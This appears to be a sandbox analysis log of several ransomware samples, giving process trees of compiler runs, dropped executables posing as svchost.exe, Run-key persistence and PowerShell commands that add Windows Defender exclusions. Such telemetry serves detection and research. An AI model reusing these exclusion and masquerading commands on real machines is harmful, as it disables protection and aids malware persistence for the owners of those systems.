C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4AE5.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3CCF54A948FD4C658898D965CB5B82F1.TMP"6⤵PID:8184
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\r51bwcum\r51bwcum.cmdline"5⤵PID:8732
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4D37.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC488BAB0F7F4408D8DA237C884128C69.TMP"6⤵PID:5528
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hoitxdim\hoitxdim.cmdline"5⤵PID:8108
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES50A2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF1A8EB07C47B45BE8B5E7781DFD5DC35.TMP"6⤵PID:2172
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\1ypnx0ob\1ypnx0ob.cmdline"5⤵PID:5912
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5390.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc37568F16DC754FE59E4884403D86A0A1.TMP"6⤵PID:5316
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yo1r2uom\yo1r2uom.cmdline"5⤵PID:7876
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5545.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc277FFDBB5D2549D7B72577A562AE190.TMP"6⤵PID:5956
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\zxs3gxqp\zxs3gxqp.cmdline"5⤵PID:5528
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5881.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc45DF66CCDF3240E2AF8C417597426213.TMP"6⤵PID:3928
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\t2ddzlj4\t2ddzlj4.cmdline"5⤵PID:5988
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5A95.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc866372EB70EC4545B55C06488976F5.TMP"6⤵PID:7072
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hddwnlja\hddwnlja.cmdline"5⤵PID:8424
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5D92.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc8AB50CB1334341DA9F16676DDA64F9B2.TMP"6⤵PID:8720
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\wcw3aidt\wcw3aidt.cmdline"5⤵PID:3940
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES61E8.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7364DD90919849BBADA7FDD41818762D.TMP"6⤵PID:7848
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mqxg2qcj\mqxg2qcj.cmdline"5⤵PID:8588
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES662D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc78EAC3A635E3416E9697DB494B224E66.TMP"6⤵PID:8180
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yeogldch\yeogldch.cmdline"5⤵PID:6700
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6756.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4C2CA0058364F2783B128961455772F.TMP"6⤵PID:5632
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\oaoiwid4\oaoiwid4.cmdline"5⤵PID:5988
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A64.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc21C0B75B821D47F9B531696ACC8DC86D.TMP"6⤵PID:7108
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\3avsuj5n\3avsuj5n.cmdline"5⤵PID:5896
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6C48.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc664C1AD0ADF04B248A2812E6519BE9C4.TMP"6⤵PID:5576
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\c3rkakim\c3rkakim.cmdline"5⤵PID:4408
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES70CC.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFE8CE423919E42C7AC835A308FD6DCC.TMP"6⤵PID:5680
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ey2el1hj\ey2el1hj.cmdline"5⤵PID:2688
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES788D.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcAA871BDBC32649528A7319CED76ADDA.TMP"6⤵PID:3244
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\fteca12t\fteca12t.cmdline"5⤵PID:4948
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B2C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1EAC94673AB64A54A4E5EC874835849.TMP"6⤵PID:6808
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\1hpaukgq\1hpaukgq.cmdline"5⤵PID:8560
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80AB.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc543997D8EB3E4D2EBC3ADD1E8F517275.TMP"6⤵PID:5408
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\o3davn1v\o3davn1v.cmdline"5⤵PID:6052
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8500.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc58EF1ECDDA4F4C5395462B62A891AABC.TMP"6⤵PID:9004
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rtypielz\rtypielz.cmdline"5⤵PID:8776
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8761.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc483F6DE632814C989297F427EE26B710.TMP"6⤵PID:9020
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lp5mrm44\lp5mrm44.cmdline"5⤵PID:8128
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8E28.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7A0B5078A5CF4C36BC5EB777E7A734FD.TMP"6⤵PID:7552
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\yumxlm4f\yumxlm4f.cmdline"5⤵PID:6820
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES907A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc78F156A223684F57A966F259AFB4A8F8.TMP"6⤵PID:64
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\bkoz141p\bkoz141p.cmdline"5⤵PID:3836
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9413.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA1100C7834E241DB9214ADF3F463BDDB.TMP"6⤵PID:7100
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\x4lqou1f\x4lqou1f.cmdline"5⤵PID:5456
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES95E8.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD9946C0E70234D9F828CEC861AEC61B.TMP"6⤵PID:8088
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\srtipqyq\srtipqyq.cmdline"5⤵PID:7920
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9869.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA56B7F454FF4A0B89423F97867C17E.TMP"6⤵PID:3388
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\nhas3sle\nhas3sle.cmdline"5⤵PID:7532
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9AE9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc7405690CFD043249F97E55F19F7AAD2.TMP"6⤵PID:8632
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\gcbpyhbq\gcbpyhbq.cmdline"5⤵PID:8204
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5852
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9CAF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA55252F47DBA4439AF3E52F7952B381F.TMP"6⤵PID:6568
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\g0sdelep\g0sdelep.cmdline"5⤵PID:7276
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA0B6.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE4436624644647DD82C7C2C5F7A28AD.TMP"6⤵PID:6132
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\it4jcfcx\it4jcfcx.cmdline"5⤵PID:5460
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA6E0.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcAFAF451692B847B495A5A39A596FDC75.TMP"6⤵PID:8560
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\oynqwktz\oynqwktz.cmdline"5⤵PID:8808
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA951.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc57005EBF86734E6483891E527E11D178.TMP"6⤵PID:6308
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lgr1aq3k\lgr1aq3k.cmdline"5⤵PID:8028
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:2952
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB0D3.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFA11CB8628BF4AC3AAF7FE89DA3D3329.TMP"6⤵PID:8720
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\hsjs2q4l\hsjs2q4l.cmdline"5⤵PID:8512
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB5A5.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcCE7BDA6B583F4714BBC4AE3E873588FC.TMP"6⤵PID:4668
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mqnkpy5w\mqnkpy5w.cmdline"5⤵PID:7748
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB7F7.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc90C097F9323143F7878FC2573855861C.TMP"6⤵PID:7988
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\id4b3ktd\id4b3ktd.cmdline"5⤵PID:7656
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB52.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1A20D0E5522A49619D12ABBDA62EC2B0.TMP"6⤵PID:8008
-
-
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.MSIL.Blocker.gen-957c86f5222d243cbae50525a9dca86d0b4cfc0c95daee34037147984f07007b.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-957c86f5222d243cbae50525a9dca86d0b4cfc0c95daee34037147984f07007b.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3660 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3468
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com4⤵PID:7700
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com4⤵PID:6228
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com4⤵PID:8988
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com4⤵PID:8136
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com4⤵PID:5964
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com4⤵PID:9120
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com4⤵PID:6564
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com4⤵PID:8268
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com4⤵PID:3012
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com4⤵PID:4896
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com4⤵PID:8652
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection bing.com4⤵PID:7260
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection google.com4⤵PID:8028
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c1e1c7ceaf74c6f65da3986b27909eeaaef8743b8a41671480a495ef16f73588.exeHEUR-Trojan-Ransom.MSIL.Blocker.gen-c1e1c7ceaf74c6f65da3986b27909eeaaef8743b8a41671480a495ef16f73588.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4204 -
C:\Users\Admin\AppData\Roaming\Client.exe"C:\Users\Admin\AppData\Roaming\Client.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5704
-
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.MSIL.Gen.gen-7bcbc81dbfbc85b4c7c40f44931788a814ded426317e6ea9456cc65c37341c92.exeHEUR-Trojan-Ransom.MSIL.Gen.gen-7bcbc81dbfbc85b4c7c40f44931788a814ded426317e6ea9456cc65c37341c92.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Agent.gen-0001ed874cf963c62c00f665d7c10b5edd9a7b0e64874562e80cd01a03eca81d.exeHEUR-Trojan-Ransom.Win32.Agent.gen-0001ed874cf963c62c00f665d7c10b5edd9a7b0e64874562e80cd01a03eca81d.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:396
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Convagent.gen-c98d09ba3d5222845d9ef8aca435cd9162ff4e1f27cafa3ff8bfae30c95f6706.exeHEUR-Trojan-Ransom.Win32.Convagent.gen-c98d09ba3d5222845d9ef8aca435cd9162ff4e1f27cafa3ff8bfae30c95f6706.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4364
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-059d3c46ce6ff055f8a28f5d2a138a266c4743138366af64a2b6c34efadb38c2.exeHEUR-Trojan-Ransom.Win32.Crypmodadv.vho-059d3c46ce6ff055f8a28f5d2a138a266c4743138366af64a2b6c34efadb38c2.exe3⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:4664
-
-
C:\Users\Admin\Desktop\00459\HEUR-Trojan-Ransom.Win32.Generic-0febad4248c26c3b44dc525eb67fa7481aa4caff7744f873a9d1c4ea8251d204.exeHEUR-Trojan-Ransom.Win32.Generic-0febad4248c26c3b44dc525eb67fa7481aa4caff7744f873a9d1c4ea8251d204.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3784 -
C:\Users\Admin\AppData\Roaming\svhost.exe"C:\Users\Admin\AppData\Roaming\svhost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1884 -
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"5⤵
- Modifies Windows Defender Real-time Protection settings
- Windows security bypass
- Checks computer location settings
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:2452 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\D90ffqe921ShG36\svchost.exe" -Force6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5716
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\svchost.exe" -Force6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5840
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Windows\Resources\Themes\aero\Shell\D90ffqe921ShG36\svchost.exe" -Force6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5980
-
-
